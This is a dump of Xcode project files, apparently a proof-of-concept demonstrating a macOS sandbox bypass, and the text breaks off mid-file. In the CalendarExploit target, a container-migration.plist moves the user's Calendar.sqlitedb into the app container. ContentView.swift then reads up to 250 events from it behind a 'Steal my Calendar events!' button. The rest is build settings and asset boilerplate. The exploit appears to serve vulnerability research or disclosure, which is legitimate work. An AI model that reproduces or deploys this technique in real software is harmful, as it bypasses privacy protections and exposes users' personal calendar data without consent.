-------------------------------------------------------------------------------- 1 | 2 | 5 | 9 | 10 | 16 | 22 | 23 | 24 | 25 | 26 | 32 | 33 | 43 | 45 | 51 | 52 | 53 | 54 | 60 | 62 | 68 | 69 | 70 | 71 | 73 | 74 | 77 | 78 | 79 | -------------------------------------------------------------------------------- /Projects/CalendarExploit/App.swift: -------------------------------------------------------------------------------- 1 | // 2 | // App.swift 3 | // CalendarExploit 4 | // 5 | // Created by Pedro José Pereira Vieito on 12/3/24. 6 | // 7 | 8 | import SwiftUI 9 | 10 | @main 11 | struct App: SwiftUI.App { 12 | var body: some Scene { 13 | Window("CalendarExploit", id: "main") { 14 | ContentView() 15 | .frame(width: 450, height: 450) 16 | } 17 | .windowResizability(.contentSize) 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /Projects/CalendarExploit/Assets.xcassets/AccentColor.colorset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "colors" : [ 3 | { 4 | "idiom" : "universal" 5 | } 6 | ], 7 | "info" : { 8 | "author" : "xcode", 9 | "version" : 1 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /Projects/CalendarExploit/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "mac", 5 | "scale" : "1x", 6 | "size" : "16x16" 7 | }, 8 | { 9 | "idiom" : "mac", 10 | "scale" : "2x", 11 | "size" : "16x16" 12 | }, 13 | { 14 | "idiom" : "mac", 15 | "scale" : "1x", 16 | "size" : "32x32" 17 | }, 18 | { 19 | "idiom" : "mac", 20 | "scale" : "2x", 21 | "size" : "32x32" 22 | }, 23 | { 24 | "idiom" : "mac", 25 | "scale" : "1x", 26 | "size" : "128x128" 27 | }, 28 | { 29 | "idiom" : "mac", 30 | "scale" : "2x", 31 | "size" : "128x128" 32 | }, 33 | { 34 | "idiom" : "mac", 35 | "scale" : "1x", 36 | "size" : "256x256" 37 | }, 38 | { 39 | "idiom" : "mac", 40 | "scale" : "2x", 41 | "size" : "256x256" 42 | }, 43 | { 44 | "idiom" : "mac", 45 | "scale" : "1x", 46 | "size" : "512x512" 47 | }, 48 | { 49 | "idiom" : "mac", 50 | "scale" : "2x", 51 | "size" : "512x512" 52 | } 53 | ], 54 | "info" : { 55 | "author" : "xcode", 56 | "version" : 1 57 | } 58 | } 59 | -------------------------------------------------------------------------------- /Projects/CalendarExploit/Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Projects/CalendarExploit/CalendarExploit.entitlements: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | com.apple.security.app-sandbox 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Projects/CalendarExploit/ContentView.swift: -------------------------------------------------------------------------------- 1 | // 2 | // ContentView.swift 3 | // CalendarExploit 4 | // 5 | // Created by Pedro José Pereira Vieito on 12/3/24. 6 | // 7 | 8 | import SwiftUI 9 | import SQLite 10 | 11 | struct ContentView: SwiftUI.View { 12 | struct CalendarEvent: Identifiable { 13 | var id: UUID 14 | let eventTitle: String? 15 | let calendarTitle: String? 16 | let startDate: String? 17 | } 18 | 19 | @State var events: [CalendarEvent] = [] 20 | 21 | var body: some SwiftUI.View { 22 | VStack { 23 | Button { 24 | Task { 25 | let containerMigrationPlistURL = Bundle.main.url(forResource: "container-migration", withExtension: "plist")! 26 | let containerMigrationPlistData = try! Data(contentsOf: containerMigrationPlistURL) 27 | let containerMigrationPlist = try! PropertyListSerialization.propertyList(from: containerMigrationPlistData, format: nil) as! [String: [[String]]] 28 | let itemPath = containerMigrationPlist["Move"]!.first!.last!.replacingOccurrences(of: "${Home}/", with: "") 29 | let calendarDatabase = FileManager.default.homeDirectoryForCurrentUser.appendingPathComponent(itemPath) 30 | 31 | do { 32 | print("[!] Loading calendar database at “\(calendarDatabase.path)”)…") 33 | let db = try Connection(calendarDatabase.path) 34 | 35 | let query = """ 36 | SELECT i.summary 37 | , i.start_datetime 38 | , c.title 39 | FROM ( 40 | SELECT * 41 | , DATETIME(i.start_date, 'unixepoch', '+31 years') AS start_datetime 42 | FROM CalendarItem i 43 | ) i 44 | INNER JOIN Calendar c 45 | ON i.calendar_id = c.ROWID 46 | WHERE start_datetime <= DATETIME() 47 | ORDER BY 2 DESC 48 | LIMIT 250 49 | """ 50 | 51 | var events: [CalendarEvent] = [] 52 | for row in try db.prepare(query) { 53 | let eventTitle = "\(row[0] ?? "--")" 54 | let startDate = "\(row[1] ?? "--")" 55 | let calendarTitle = "\(row[2] ?? "--")" 56 | let event = CalendarEvent(id: UUID(), eventTitle: eventTitle, calendarTitle: calendarTitle, startDate: startDate) 57 | print("[*] \(eventTitle), \(startDate), \(calendarTitle))") 58 | events.append(event) 59 | } 60 | self.events = events 61 | 62 | } 63 | catch { 64 | print("[x] \(error.localizedDescription)") 65 | } 66 | } 67 | } label: { 68 | Image(systemName: "lock.open.trianglebadge.exclamationmark.fill") 69 | Text("Steal my Calendar events!") 70 | } 71 | .padding() 72 | 73 | if !events.isEmpty { 74 | Form { 75 | List { 76 | ForEach(self.events) { event in 77 | HStack { 78 | VStack(alignment: .leading) { 79 | Text(event.eventTitle ?? "--") 80 | .font(.headline) 81 | if let startDate = event.startDate { 82 | Text(startDate) 83 | .font(.subheadline) 84 | } 85 | if let detail = event.calendarTitle { 86 | Text(detail) 87 | .font(.subheadline) 88 | } 89 | } 90 | } 91 | } 92 | } 93 | } 94 | .formStyle(.grouped) 95 | } 96 | } 97 | } 98 | } 99 | 100 | #Preview { 101 | ContentView() 102 | } 103 | -------------------------------------------------------------------------------- /Projects/CalendarExploit/container-migration.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Move 6 | 7 | 8 | ${Home}/Library/Calendars/Calendar.sqlitedb 9 | ${Home}/Calendar.sqlitedb 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /Projects/ContainerMigrationExploit.xcodeproj/project.pbxproj: -------------------------------------------------------------------------------- 1 | // !$*UTF8*$! 2 | { 3 | archiveVersion = 1; 4 | classes = { 5 | }; 6 | objectVersion = 56; 7 | objects = { 8 | 9 | /* Begin PBXBuildFile section */ 10 | AA6D8F462BA0842600C1A3C7 /* App.swift in Sources */ = {isa = PBXBuildFile; fileRef = AA6D8F452BA0842600C1A3C7 /* App.swift */; }; 11 | AA6D8F482BA0842600C1A3C7 /* ContentView.swift in Sources */ = {isa = PBXBuildFile; fileRef = AA6D8F472BA0842600C1A3C7 /* ContentView.swift */; }; 12 | AA6D8F4A2BA0842800C1A3C7 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = AA6D8F492BA0842800C1A3C7 /* Assets.xcassets */; }; 13 | AA6D8F552BA087FD00C1A3C7 /* container-migration.plist in Resources */ = {isa = PBXBuildFile; fileRef = AA6D8F542BA087FD00C1A3C7 /* container-migration.plist */; }; 14 | AA6D8F692BA0937900C1A3C7 /* App.swift in Sources */ = {isa = PBXBuildFile; fileRef = AA6D8F452BA0842600C1A3C7 /* App.swift */; }; 15 | AA6D8F6A2BA0937C00C1A3C7 /* container-migration.plist in Resources */ = {isa = PBXBuildFile; fileRef = AA6D8F542BA087FD00C1A3C7 /* container-migration.plist */; }; 16 | AA6D8F6B2BA0937C00C1A3C7 /* ContentView.swift in Sources */ = {isa = PBXBuildFile; fileRef = AA6D8F472BA0842600C1A3C7 /* ContentView.swift */; }; 17 | AA6D8F6C2BA0937F00C1A3C7 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = AA6D8F492BA0842800C1A3C7 /* Assets.xcassets */; }; 18 | /* End PBXBuildFile section */ 19 | 20 | /* Begin PBXFileReference section */ 21 | AA6D8F422BA0842600C1A3C7 /* Exploit.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = Exploit.app; sourceTree = BUILT_PRODUCTS_DIR; }; 22 | AA6D8F452BA0842600C1A3C7 /* App.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = App.swift; sourceTree = ""; }; 23 | AA6D8F472BA0842600C1A3C7 /* ContentView.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = ContentView.swift; sourceTree = ""; }; 24 | AA6D8F492BA0842800C1A3C7 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; 25 | AA6D8F4E2BA0842800C1A3C7 /* AppSandbox.entitlements */ = {isa = PBXFileReference; lastKnownFileType = text.plist.entitlements; path = AppSandbox.entitlements; sourceTree = ""; }; 26 | AA6D8F542BA087FD00C1A3C7 /* container-migration.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = "container-migration.plist"; sourceTree = ""; }; 27 | AA6D8F5A2BA0923D00C1A3C7 /* Expected.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = Expected.app; sourceTree = BUILT_PRODUCTS_DIR; }; 28 | /* End PBXFileReference section */ 29 | 30 | /* Begin PBXFrameworksBuildPhase section */ 31 | AA6D8F3F2BA0842600C1A3C7 /* Frameworks */ = { 32 | isa = PBXFrameworksBuildPhase; 33 | buildActionMask = 2147483647; 34 | files = ( 35 | ); 36 | runOnlyForDeploymentPostprocessing = 0; 37 | }; 38 | AA6D8F572BA0923D00C1A3C7 /* Frameworks */ = { 39 | isa = PBXFrameworksBuildPhase; 40 | buildActionMask = 2147483647; 41 | files = ( 42 | ); 43 | runOnlyForDeploymentPostprocessing = 0; 44 | }; 45 | /* End PBXFrameworksBuildPhase section */ 46 | 47 | /* Begin PBXGroup section */ 48 | AA6D8F392BA0842600C1A3C7 = { 49 | isa = PBXGroup; 50 | children = ( 51 | AA6D8F442BA0842600C1A3C7 /* ContainerMigrationExploit */, 52 | AA6D8F432BA0842600C1A3C7 /* Products */, 53 | ); 54 | sourceTree = ""; 55 | }; 56 | AA6D8F432BA0842600C1A3C7 /* Products */ = { 57 | isa = PBXGroup; 58 | children = ( 59 | AA6D8F422BA0842600C1A3C7 /* Exploit.app */, 60 | AA6D8F5A2BA0923D00C1A3C7 /* Expected.app */, 61 | ); 62 | name = Products; 63 | sourceTree = ""; 64 | }; 65 | AA6D8F442BA0842600C1A3C7 /* ContainerMigrationExploit */ = { 66 | isa = PBXGroup; 67 | children = ( 68 | AA6D8F452BA0842600C1A3C7 /* App.swift */, 69 | AA6D8F542BA087FD00C1A3C7 /* container-migration.plist */, 70 | AA6D8F472BA0842600C1A3C7 /* ContentView.swift */, 71 | AA6D8F492BA0842800C1A3C7 /* Assets.xcassets */, 72 | AA6D8F4E2BA0842800C1A3C7 /* AppSandbox.entitlements */, 73 | ); 74 | path = ContainerMigrationExploit; 75 | sourceTree = ""; 76 | }; 77 | /* End PBXGroup section */ 78 | 79 | /* Begin PBXNativeTarget section */ 80 | AA6D8F412BA0842600C1A3C7 /* Exploit */ = { 81 | isa = PBXNativeTarget; 82 | buildConfigurationList = AA6D8F512BA0842800C1A3C7 /* Build configuration list for PBXNativeTarget "Exploit" */; 83 | buildPhases = ( 84 | AA6D8F3E2BA0842600C1A3C7 /* Sources */, 85 | AA6D8F3F2BA0842600C1A3C7 /* Frameworks */, 86 | AA6D8F402BA0842600C1A3C7 /* Resources */, 87 | ); 88 | buildRules = ( 89 | ); 90 | dependencies = ( 91 | ); 92 | name = Exploit; 93 | productName = ContainerMigrationExploitApp; 94 | productReference = AA6D8F422BA0842600C1A3C7 /* Exploit.app */; 95 | productType = "com.apple.product-type.application"; 96 | }; 97 | AA6D8F592BA0923D00C1A3C7 /* Expected */ = { 98 | isa = PBXNativeTarget; 99 | buildConfigurationList = AA6D8F662BA0923E00C1A3C7 /* Build configuration list for PBXNativeTarget "Expected" */; 100 | buildPhases = ( 101 | AA6D8F562BA0923D00C1A3C7 /* Sources */, 102 | AA6D8F572BA0923D00C1A3C7 /* Frameworks */, 103 | AA6D8F582BA0923D00C1A3C7 /* Resources */, 104 | ); 105 | buildRules = ( 106 | ); 107 | dependencies = ( 108 | ); 109 | name = Expected; 110 | productName = Expected; 111 | productReference = AA6D8F5A2BA0923D00C1A3C7 /* Expected.app */; 112 | productType = "com.apple.product-type.application"; 113 | }; 114 | /* End PBXNativeTarget section */ 115 | 116 | /* Begin PBXProject section */ 117 | AA6D8F3A2BA0842600C1A3C7 /* Project object */ = { 118 | isa = PBXProject; 119 | attributes = { 120 | BuildIndependentTargetsInParallel = 1; 121 | LastSwiftUpdateCheck = 1530; 122 | LastUpgradeCheck = 1530; 123 | TargetAttributes = { 124 | AA6D8F412BA0842600C1A3C7 = { 125 | CreatedOnToolsVersion = 15.3; 126 | }; 127 | AA6D8F592BA0923D00C1A3C7 = { 128 | CreatedOnToolsVersion = 15.3; 129 | }; 130 | }; 131 | }; 132 | buildConfigurationList = AA6D8F3D2BA0842600C1A3C7 /* Build configuration list for PBXProject "ContainerMigrationExploit" */; 133 | compatibilityVersion = "Xcode 14.0"; 134 | developmentRegion = en; 135 | hasScannedForEncodings = 0; 136 | knownRegions = ( 137 | en, 138 | Base, 139 | ); 140 | mainGroup = AA6D8F392BA0842600C1A3C7; 141 | productRefGroup = AA6D8F432BA0842600C1A3C7 /* Products */; 142 | projectDirPath = ""; 143 | projectRoot = ""; 144 | targets = ( 145 | AA6D8F412BA0842600C1A3C7 /* Exploit */, 146 | AA6D8F592BA0923D00C1A3C7 /* Expected */, 147 | ); 148 | }; 149 | /* End PBXProject section */ 150 | 151 | /* Begin PBXResourcesBuildPhase section */ 152 | AA6D8F402BA0842600C1A3C7 /* Resources */ = { 153 | isa = PBXResourcesBuildPhase; 154 | buildActionMask = 2147483647; 155 | files = ( 156 | AA6D8F552BA087FD00C1A3C7 /* container-migration.plist in Resources */, 157 | AA6D8F4A2BA0842800C1A3C7 /* Assets.xcassets in Resources */, 158 | ); 159 | runOnlyForDeploymentPostprocessing = 0; 160 | }; 161 | AA6D8F582BA0923D00C1A3C7 /* Resources */ = { 162 | isa = PBXResourcesBuildPhase; 163 | buildActionMask = 2147483647; 164 | files = ( 165 | AA6D8F6C2BA0937F00C1A3C7 /* Assets.xcassets in Resources */, 166 | AA6D8F6A2BA0937C00C1A3C7 /* container-migration.plist in Resources */, 167 | ); 168 | runOnlyForDeploymentPostprocessing = 0; 169 | }; 170 | /* End PBXResourcesBuildPhase section */ 171 | 172 | /* Begin PBXSourcesBuildPhase section */ 173 | AA6D8F3E2BA0842600C1A3C7 /* Sources */ = { 174 | isa = PBXSourcesBuildPhase; 175 | buildActionMask = 2147483647; 176 | files = ( 177 | AA6D8F482BA0842600C1A3C7 /* ContentView.swift in Sources */, 178 | AA6D8F462BA0842600C1A3C7 /* App.swift in Sources */, 179 | ); 180 | runOnlyForDeploymentPostprocessing = 0; 181 | }; 182 | AA6D8F562BA0923D00C1A3C7 /* Sources */ = { 183 | isa = PBXSourcesBuildPhase; 184 | buildActionMask = 2147483647; 185 | files = ( 186 | AA6D8F6B2BA0937C00C1A3C7 /* ContentView.swift in Sources */, 187 | AA6D8F692BA0937900C1A3C7 /* App.swift in Sources */, 188 | ); 189 | runOnlyForDeploymentPostprocessing = 0; 190 | }; 191 | /* End PBXSourcesBuildPhase section */ 192 | 193 | /* Begin XCBuildConfiguration section */ 194 | AA6D8F4F2BA0842800C1A3C7 /* Debug */ = { 195 | isa = XCBuildConfiguration; 196 | buildSettings = { 197 | ALWAYS_SEARCH_USER_PATHS = NO; 198 | ASSETCATALOG_COMPILER_GENERATE_SWIFT_ASSET_SYMBOL_EXTENSIONS = YES; 199 | CLANG_ANALYZER_NONNULL = YES; 200 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 201 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++20"; 202 | CLANG_ENABLE_MODULES = YES; 203 | CLANG_ENABLE_OBJC_ARC = YES; 204 | CLANG_ENABLE_OBJC_WEAK = YES; 205 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 206 | CLANG_WARN_BOOL_CONVERSION = YES; 207 | CLANG_WARN_COMMA = YES; 208 | CLANG_WARN_CONSTANT_CONVERSION = YES; 209 | CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; 210 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 211 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 212 | CLANG_WARN_EMPTY_BODY = YES; 213 | CLANG_WARN_ENUM_CONVERSION = YES; 214 | CLANG_WARN_INFINITE_RECURSION = YES; 215 | CLANG_WARN_INT_CONVERSION = YES; 216 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 217 | CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; 218 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 219 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 220 | CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES; 221 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 222 | CLANG_WARN_STRICT_PROTOTYPES = YES; 223 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 224 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 225 | CLANG_WARN_UNREACHABLE_CODE = YES; 226 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 227 | COPY_PHASE_STRIP = NO; 228 | DEBUG_INFORMATION_FORMAT = dwarf; 229 | ENABLE_STRICT_OBJC_MSGSEND = YES; 230 | ENABLE_TESTABILITY = YES; 231 | ENABLE_USER_SCRIPT_SANDBOXING = YES; 232 | GCC_C_LANGUAGE_STANDARD = gnu17; 233 | GCC_DYNAMIC_NO_PIC = NO; 234 | GCC_NO_COMMON_BLOCKS = YES; 235 | GCC_OPTIMIZATION_LEVEL = 0; 236 | GCC_PREPROCESSOR_DEFINITIONS = ( 237 | "DEBUG=1", 238 | "$(inherited)", 239 | ); 240 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 241 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 242 | GCC_WARN_UNDECLARED_SELECTOR = YES; 243 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 244 | GCC_WARN_UNUSED_FUNCTION = YES; 245 | GCC_WARN_UNUSED_VARIABLE = YES; 246 | LOCALIZATION_PREFERS_STRING_CATALOGS = YES; 247 | MACOSX_DEPLOYMENT_TARGET = 14.4; 248 | MTL_ENABLE_DEBUG_INFO = INCLUDE_SOURCE; 249 | MTL_FAST_MATH = YES; 250 | ONLY_ACTIVE_ARCH = YES; 251 | SDKROOT = macosx; 252 | SWIFT_ACTIVE_COMPILATION_CONDITIONS = "DEBUG $(inherited)"; 253 | SWIFT_OPTIMIZATION_LEVEL = "-Onone"; 254 | }; 255 | name = Debug; 256 | }; 257 | AA6D8F502BA0842800C1A3C7 /* Release */ = { 258 | isa = XCBuildConfiguration; 259 | buildSettings = { 260 | ALWAYS_SEARCH_USER_PATHS = NO; 261 | ASSETCATALOG_COMPILER_GENERATE_SWIFT_ASSET_SYMBOL_EXTENSIONS = YES; 262 | CLANG_ANALYZER_NONNULL = YES; 263 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 264 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++20"; 265 | CLANG_ENABLE_MODULES = YES; 266 | CLANG_ENABLE_OBJC_ARC = YES; 267 | CLANG_ENABLE_OBJC_WEAK = YES; 268 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 269 | CLANG_WARN_BOOL_CONVERSION = YES; 270 | CLANG_WARN_COMMA = YES; 271 | CLANG_WARN_CONSTANT_CONVERSION = YES; 272 | CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; 273 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 274 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 275 | CLANG_WARN_EMPTY_BODY = YES; 276 | CLANG_WARN_ENUM_CONVERSION = YES; 277 | CLANG_WARN_INFINITE_RECURSION = YES; 278 | CLANG_WARN_INT_CONVERSION = YES; 279 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 280 | CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; 281 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 282 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 283 | CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES; 284 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 285 | CLANG_WARN_STRICT_PROTOTYPES = YES; 286 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 287 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 288 | CLANG_WARN_UNREACHABLE_CODE = YES; 289 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 290 | COPY_PHASE_STRIP = NO; 291 | DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; 292 | ENABLE_NS_ASSERTIONS = NO; 293 | ENABLE_STRICT_OBJC_MSGSEND = YES; 294 | ENABLE_USER_SCRIPT_SANDBOXING = YES; 295 | GCC_C_LANGUAGE_STANDARD = gnu17; 296 | GCC_NO_COMMON_BLOCKS = YES; 297 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 298 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 299 | GCC_WARN_UNDECLARED_SELECTOR = YES; 300 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 301 | GCC_WARN_UNUSED_FUNCTION = YES; 302 | GCC_WARN_UNUSED_VARIABLE = YES; 303 | LOCALIZATION_PREFERS_STRING_CATALOGS = YES; 304 | MACOSX_DEPLOYMENT_TARGET = 14.4; 305 | MTL_ENABLE_DEBUG_INFO = NO; 306 | MTL_FAST_MATH = YES; 307 | SDKROOT = macosx; 308 | SWIFT_COMPILATION_MODE = wholemodule; 309 | }; 310 | name = Release; 311 | }; 312 | AA6D8F522BA0842800C1A3C7 /* Debug */ = { 313 | isa = XCBuildConfiguration; 314 | buildSettings = { 315 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 316 | ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; 317 | CODE_SIGN_ENTITLEMENTS = ContainerMigrationExploit/AppSandbox.entitlements; 318 | "CODE_SIGN_IDENTITY[sdk=macosx*]" = "Apple Development"; 319 | CODE_SIGN_STYLE = Automatic; 320 | COMBINE_HIDPI_IMAGES = YES; 321 | CURRENT_PROJECT_VERSION = 1; 322 | DEVELOPMENT_TEAM = T7MC635YG5; 323 | ENABLE_HARDENED_RUNTIME = YES; 324 | ENABLE_PREVIEWS = YES; 325 | GENERATE_INFOPLIST_FILE = YES; 326 | INFOPLIST_KEY_NSHumanReadableCopyright = ""; 327 | LD_RUNPATH_SEARCH_PATHS = ( 328 | "$(inherited)", 329 | "@executable_path/../Frameworks", 330 | ); 331 | MARKETING_VERSION = 1.0; 332 | PRODUCT_BUNDLE_IDENTIFIER = com.pvieito.ContainerMigrationExploitApp; 333 | PRODUCT_NAME = "$(TARGET_NAME)"; 334 | SWIFT_EMIT_LOC_STRINGS = YES; 335 | SWIFT_VERSION = 5.0; 336 | }; 337 | name = Debug; 338 | }; 339 | AA6D8F532BA0842800C1A3C7 /* Release */ = { 340 | isa = XCBuildConfiguration; 341 | buildSettings = { 342 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 343 | ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; 344 | CODE_SIGN_ENTITLEMENTS = ContainerMigrationExploit/AppSandbox.entitlements; 345 | "CODE_SIGN_IDENTITY[sdk=macosx*]" = "Apple Development"; 346 | CODE_SIGN_STYLE = Automatic; 347 | COMBINE_HIDPI_IMAGES = YES; 348 | CURRENT_PROJECT_VERSION = 1; 349 | DEVELOPMENT_TEAM = T7MC635YG5; 350 | ENABLE_HARDENED_RUNTIME = YES; 351 | ENABLE_PREVIEWS = YES; 352 | GENERATE_INFOPLIST_FILE = YES; 353 | INFOPLIST_KEY_NSHumanReadableCopyright = ""; 354 | LD_RUNPATH_SEARCH_PATHS = ( 355 | "$(inherited)", 356 | "@executable_path/../Frameworks", 357 | ); 358 | MARKETING_VERSION = 1.0; 359 | PRODUCT_BUNDLE_IDENTIFIER = com.pvieito.ContainerMigrationExploitApp; 360 | PRODUCT_NAME = "$(TARGET_NAME)"; 361 | SWIFT_EMIT_LOC_STRINGS = YES; 362 | SWIFT_VERSION = 5.0; 363 | }; 364 | name = Release; 365 | }; 366 | AA6D8F672BA0923E00C1A3C7 /* Debug */ = { 367 | isa = XCBuildConfiguration; 368 | buildSettings = { 369 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 370 | ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; 371 | CODE_SIGN_STYLE = Automatic; 372 | COMBINE_HIDPI_IMAGES = YES; 373 | CURRENT_PROJECT_VERSION = 1; 374 | DEVELOPMENT_TEAM = T7MC635YG5; 375 | ENABLE_HARDENED_RUNTIME = NO; 376 | ENABLE_PREVIEWS = YES; 377 | GENERATE_INFOPLIST_FILE = YES; 378 | INFOPLIST_KEY_NSHumanReadableCopyright = ""; 379 | LD_RUNPATH_SEARCH_PATHS = ( 380 | "$(inherited)", 381 | "@executable_path/../Frameworks", 382 | ); 383 | MARKETING_VERSION = 1.0; 384 | PRODUCT_BUNDLE_IDENTIFIER = com.pvieito.ContainerMigrationExpectedApp; 385 | PRODUCT_NAME = "$(TARGET_NAME)"; 386 | SWIFT_EMIT_LOC_STRINGS = YES; 387 | SWIFT_VERSION = 5.0; 388 | }; 389 | name = Debug; 390 | }; 391 | AA6D8F682BA0923E00C1A3C7 /* Release */ = { 392 | isa = XCBuildConfiguration; 393 | buildSettings = { 394 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 395 | ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; 396 | CODE_SIGN_STYLE = Automatic; 397 | COMBINE_HIDPI_IMAGES = YES; 398 | CURRENT_PROJECT_VERSION = 1; 399 | DEVELOPMENT_TEAM = T7MC635YG5; 400 | ENABLE_HARDENED_RUNTIME = NO; 401 | ENABLE_PREVIEWS = YES; 402 | GENERATE_INFOPLIST_FILE = YES; 403 | INFOPLIST_KEY_NSHumanReadableCopyright = ""; 404 | LD_RUNPATH_SEARCH_PATHS = ( 405 | "$(inherited)", 406 | "@executable_path/../Frameworks", 407 | ); 408 | MARKETING_VERSION = 1.0; 409 | PRODUCT_BUNDLE_IDENTIFIER = com.pvieito.ContainerMigrationExpectedApp; 410 | PRODUCT_NAME = "$(TARGET_NAME)"; 411 | SWIFT_EMIT_LOC_STRINGS = YES; 412 | SWIFT_VERSION = 5.0; 413 | }; 414 | name = Release; 415 | }; 416 | /* End XCBuildConfiguration section */ 417 | 418 | /* Begin XCConfigurationList section */ 419 | AA6D8F3D2BA0842600C1A3C7 /* Build configuration list for PBXProject "ContainerMigrationExploit" */ = { 420 | isa = XCConfigurationList; 421 | buildConfigurations = ( 422 | AA6D8F4F2BA0842800C1A3C7 /* Debug */, 423 | AA6D8F502BA0842800C1A3C7 /* Release */, 424 | ); 425 | defaultConfigurationIsVisible = 0; 426 | defaultConfigurationName = Release; 427 | }; 428 | AA6D8F512BA0842800C1A3C7 /* Build configuration list for PBXNativeTarget "Exploit" */ = { 429 | isa = XCConfigurationList; 430 | buildConfigurations = ( 431 | AA6D8F522BA0842800C1A3C7 /* Debug */, 432 | AA6D8F532BA0842800C1A3C7 /* Release */, 433 | ); 434 | defaultConfigurationIsVisible = 0; 435 | defaultConfigurationName = Release; 436 | }; 437 | AA6D8F662BA0923E00C1A3C7 /* Build configuration list for PBXNativeTarget "Expected" */ = { 438 | isa = XCConfigurationList; 439 | buildConfigurations = ( 440 | AA6D8F672BA0923E00C1A3C7 /* Debug */, 441 | AA6D8F682BA0923E00C1A3C7 /* Release */, 442 | ); 443 | defaultConfigurationIsVisible = 0; 444 | defaultConfigurationName = Release; 445 | }; 446 | /* End XCConfigurationList section */ 447 | }; 448 | rootObject = AA6D8F3A2BA0842600C1A3C7 /* Project object */; 449 | } 450 | -------------------------------------------------------------------------------- /Projects/ContainerMigrationExploit.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Projects/ContainerMigrationExploit.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Projects/ContainerMigrationExploit.xcodeproj/xcshareddata/xcschemes/Exploit.xcscheme: -------------------------------------------------------------------------------- 1 | 2 | 5 | 9 | 10 | 16 | 22 | 23 | 24 | 25 | 26 | 32 | 33 | 43 | 45 | 51 | 52 | 53 | 54 | 60 | 62 | 68 | 69 | 70 | 71 | 73 | 74 | 77 | 78 | 79 | -------------------------------------------------------------------------------- /Projects/ContainerMigrationExploit/App.swift: -------------------------------------------------------------------------------- 1 | // 2 | // App.swift 3 | // ContainerMigrationExploit 4 | // 5 | // Created by Pedro José Pereira Vieito on 12/3/24. 6 | // 7 | 8 | import SwiftUI 9 | 10 | @main 11 | struct App: SwiftUI.App { 12 | var body: some 